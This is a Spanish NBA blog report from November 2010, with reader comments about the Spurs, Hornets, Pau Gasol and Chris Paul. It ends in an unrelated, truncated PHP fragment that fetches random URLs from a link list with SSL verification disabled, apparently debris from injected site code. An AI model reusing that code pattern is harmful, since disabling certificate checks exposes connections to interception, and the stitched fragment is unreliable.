Informe #2

22 de November de 2010 por TheDeerHunter

Transcurrido ya un mes de competición llega nuestro segundo informe. Veamos qué es lo que ha ocurrido en la liga las dos últimas semanas.

¿Porqué todos los jugones sonríen igual?

Supongo que cualquier hijo de vecino sonreiría como Tony Parker si se pudiera permitir el lujo de dar puerta a la Longoria por pivonazos que no desmerecen en absoluto, mientras lidera a su equipo hacia la cabeza de la liga con un nivel de juego impresionante. Pocas veces Popovic les ha visto atacar de forma tan fluida como ahora. Con la incorporación de Splitter y Gary Neal, ¿pueden ser los tapados del Oeste? De momento llevan 10 seguidos sobradísimos.

Igualados a ellos, los Hornets se mantienen con una inesperada solidez. Hasta el momento son, junto a su técnico Monty Williams,  las revelaciones del campeonato. Habiendo logrado involucrar al mago Belinelli y a Jason Smith se han movido bien para compensar más aún el equipo. Abren el camino a Pondexter y a buen seguro encontrarán utilidad a Jack y quizás Andersen. Con Banks lo tendrán más complicado. Hay que ir empezando a tomarles en serio.

Es más que posible que Pau Gasol termine elegido como mejor jugador del mes en el Oeste. En L.A. están alucinando con él… y no vamos a negarlo, nosotros también un poco. Es raro ver a un jugador de su edad progresar tanto de un año a otro. Los Lakers de Gasol mantienen sus opciones intactas a pesar de un par de manchas defensivas durante estas semanas.

Por último destacaremos dos jóvenes pero prometedores grupos. Tanto los Thunder como los Bulls empezaron la competición de forma un tanto decepcionante. Con bajas significativas ambas franquicias se han colocado en el top-4 de sus respectivas conferencias. Una sola derrota en dos semanas.

Ganarás el pan con el sudor de tu frente

La conferencia Este no consigue arrancar. En este momento está liderada por los Magic, más por deméritos de otros que por el juego que viene desplegando. Nos está gustando mucho su nivel defensivo pero con esa ofensiva no le van a hacer temblar a Doc Rivers.

Los Celtics, en cambio, sí venían impresionando con Rondo de líder, Garnett y Shaq en buena forma y el resto en su línea. Dos partidos seguidos raros nos han dejado un tanto desconcertados. Suponemos que son despistes puntuales en un equipo que se lo puede permitir.

Si la sección noble del Este parece haberse estancado un poco no sucede lo mismo con la clase humilde de la conferencia. Tras un comienzo bastante malo, el asegurar un 50% de victorias les hace meterse en la lucha por plaza de PO. Entre la 6ª plaza de Indiana (3-3 estas dos últimas semanas) y la 12ª de los Raptors (4-4) hay una diferencia mínima. Ahí también andan metidos Bucks (3-3), Pistons (3-3) y Bobcats (3-3)

Mientras, en el Oeste el gran juego de Dallas (5-2) y Utah (6-2) no les sirve para nada más que ser quintos y sextos. Peor lo tiene Portland con todas esas noticias negativas y un 50% que les sirve para aguantar.

Se dejaban llevar

No sólo que los Heat no han dado todavía con la tecla tras un mes de competición sino que cada vez parecen más asequibles. Hay quien ya menciona maliciosamente los turrones para Spoelstra. Los Hawks, tras un inicio arrollador, también se están hundiendo en la mediocridad.

Los Nuggets son capaces de aniquilar a los Lakers un día y perder contra los Suns al siguiente. Sufrir contra los Knicks al otro y caer en Portland en ausencia de Roy. Los problemas físicos provocan que Suns y Warriors se encuentren haciendo la goma.

Grizzlies, Kings, Wolves o Wizards están cada día más lejos de cualquier objetivo.

El carabasas club

El lamentable 1-13 de los Clippers lo describe todo. Al menos ellos sueñan con lo que les darán algún día Blake Griffin y los otros rookies. Lo malo es que ni batiendo récords históricos de producción logran encontrar la senda de la victoria.

De donde no hay no se puede sacar… por ello es aún más grave la situación de Houston Rockets. Y eso que Scola, Martin y Brad Miller se están multiplicando…

Nets o Sixers empezaron mal… pero aún han logrado estropearlo aún más.

PREMIOS TJNBA

¿Por qué eres tan bueno?

Podríamos volver a mencionar a Pau Gasol y alguna de sus hazañas sobrehumanas, sin embargo en esta ocasión nos quedamos con el hombre del momento: Tony Parker, más de 22 puntos por partido, 7 asistencias, 4 rebotes y un par de robos además de ligarse a todas las tías que se le planten por delante.

Al salir de clase.

La lesión de Wall le deja estos días el camino libre para brillar. A Blake Griffin le hace falta un poco de regularidad, pero actuaciones como la del otro día contra los Knicks son de todo menos normales.

La vida puede ser maravillosa.

Hoy tocan los Spurs hasta en la sopa. En realidad hablamos de un jugador que no debería estar aquí, pero tras algunos años con problemas de distinta índole, Richard Jefferson por fin justifica su fichaje. Si los texanos recuperan su status de contendientes en gran parte será gracias a su recuperación.

Cortocircuitos S.L.

El bajón tan preocupante de los Hawks tiene un nombre propio: Jamal Crawford. No parece la mejor manera de ganarse una renovación. Estamos hablando de un sueldo de casi 11 kilos…

Comenta

11 comentarios a esta entrada

  1. wakefield dice:
    #1

    Felicitaciones por el blog, siempre lo sigo. Pero es extraño porque para mi es de escandalo lo de Cris Paul, no por sus números o un actuacion particular (que las tiene) sino porque su impacto es impresionante, vuelve y deja 11-1 a un equipo que el año pasado la pasaba mal, y hace que sus mas que dudosos compañeros salten en calidad. Porque esta visto lo facil que es jugar al lado suyo, yo creo que es el jugador mas importante de este año, justo cuando muchos decian que se quede Collison y se vaya Paul.

      Citar

  2. TX dice:
    #2

    ¿Equipo destacado Spurs? ¿Y Tony Parker?
    Ambos están rindiendo a un nivel muy bueno pero los Hornets lo están haciendo mejor. Solo hay que comparar las plantillas que tienen y que los Hornets siguen teniendo una victoria más contra equipos como Heat y Orlando Magic.
    Por otra parte el jugador del momento para mi es Pau. No soy un gran fan suyo; es más: soy anti-lakers pero Pau se lo está ganando y está haciendo unos númeos espectaculares. También subrallar la actuacion de Paul, Williams y Griffin

      Citar

  3. Tiago dice:
    #3

    El caso es que Hornets da menos miedo que un toro sin cuernos. A que pueden aspirar..¿a entrar en playoffs?.
    En cambio Spurs de seguir asi es claramente la única alternativa a Lakers en el oeste.

      Citar

  4. TX dice:
    #4

    ¿Como los Suns el año pasado?

      Citar

  5. Jona dice:
    #5

    Hornets no creo que aguante el ritmo, sinceramente , ademas de playoffs que se olviden me recuerdan a portland grandes regulares y batacazos en postemporada

      Citar

  6. nacho dice:
    #6

    Lo de Pau es espectacular, yo no le veo tanta progresión desde el año pasado, si acaso la progesiónes la de su equipo que se da cuenta de lo que tiene. Brutal. Y este año, añade números. Llevamos un sexto de la temporada, y aparecerán los que digan que todavía es prono para análisis, pero es que… de memoria: 3º en rebotes, 12ª o 13º en anotación, 1º hombre alto en asistencias 3tantosª en total. 1º en eficiencia con una ventaja brutal sobre el segundo, 1º en pts/reb/asis, entre los 10 primeros en %tiro, 2º alto en %FT, no se si me queda algo… Ah! sí, que luego nos llaman chauvinistas y no es de los diez mejores de la década (lo siento Viva, pero la espinita la tengo clavada y aún me duele), Supono que también nos hace daño los marcas as sports y telarañas españolistas-catalanistas, pero vamos, si aún no le dan el jugador del mes después del último partido (ah!, 1º ed Doubles/doubles o como se diga, y eso que este se quedó a un rebote)

    Lo de Chris Paul es muy bueno también (aún no lo he visto jugar) pero hablamos de un tipo y un equipo que seeshace como los azucarillos (año pasado), por eso yo prefiero al que siepre pica y pica, aunque no termine de hacer el callo grande, como Deron y los Jazz (siendo además como son del estado yanqui que más grima me da)

    Por eso estoy de acuerdo con Tiago, cuidado con los Spus, que si están ahí en el momento a LA le puede pasar lo que al BarÇa con CajaLaboral el año pasado.

    TJNBA, buena serie, como siempre, Un saludo, Nacho

      Citar

  7. TheDeerHunter dice:
    #7

    @TX: Ten en cuenta que en cada informe venimos a referirnos a un periodo de tiempo concreto. En este caso dos semanas donde los Spurs han sido los únicos invictos.
    También he resaltado a los Hornets pero mientras no se demuestre lo contrario ellos tienen más que demostrar que los Spurs (y no quiero ser resultadista en este momento) por eso, en caso de empate yo me la jugaría antes por los tejanos. No es el caso, no obstante.

    Después, entre el hipotético duelo individual Paul vs Parker… también me decanto por el francés, entre otras cosas por lo particular de su situación personal. Posiblemente por las consideraciones que tú mencionas igual está antes Paul en la carrera por el MVP, pero en términos prácticos a mí me da que está un poco más comedido que Parker, que está anotando salvajemente. Quizás es que Paul nos tiene mal acostumbrados…

      Citar

  8. TheDeerHunter dice:
    #8

    Westbrook 23ptos, 8 asistencias y 3.5 rebotes MVP de la semana en el Oeste… Pau 22 ptos, 12 rebotes y 4 asistencias ni nominado… wtf???

    Stat por su lado 29-9.5 rebotes tiene algo más de justificación…

      Citar

  9. Txusma dice:
    #9

    Es impensable que la NBA le de semana sí, semana tb el premio a un jugador no americano. Y seguro q en caso de medio-empate intentan que haya la mayor variedad posible.

      Citar

  10. sergio dice:
    #10

    El problema es q no esta ni nominado al MVP of the Week

      Citar

  11. TheDeerHunter dice:
    #11

    Ahora una tal Sophia Egeler, modelo de 19 añitos… pero buscas en google y sólo salen fotos de Parker y la Longoria.
    No hay duda acerca de quién están siendo el jugón de los últimos tiempos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>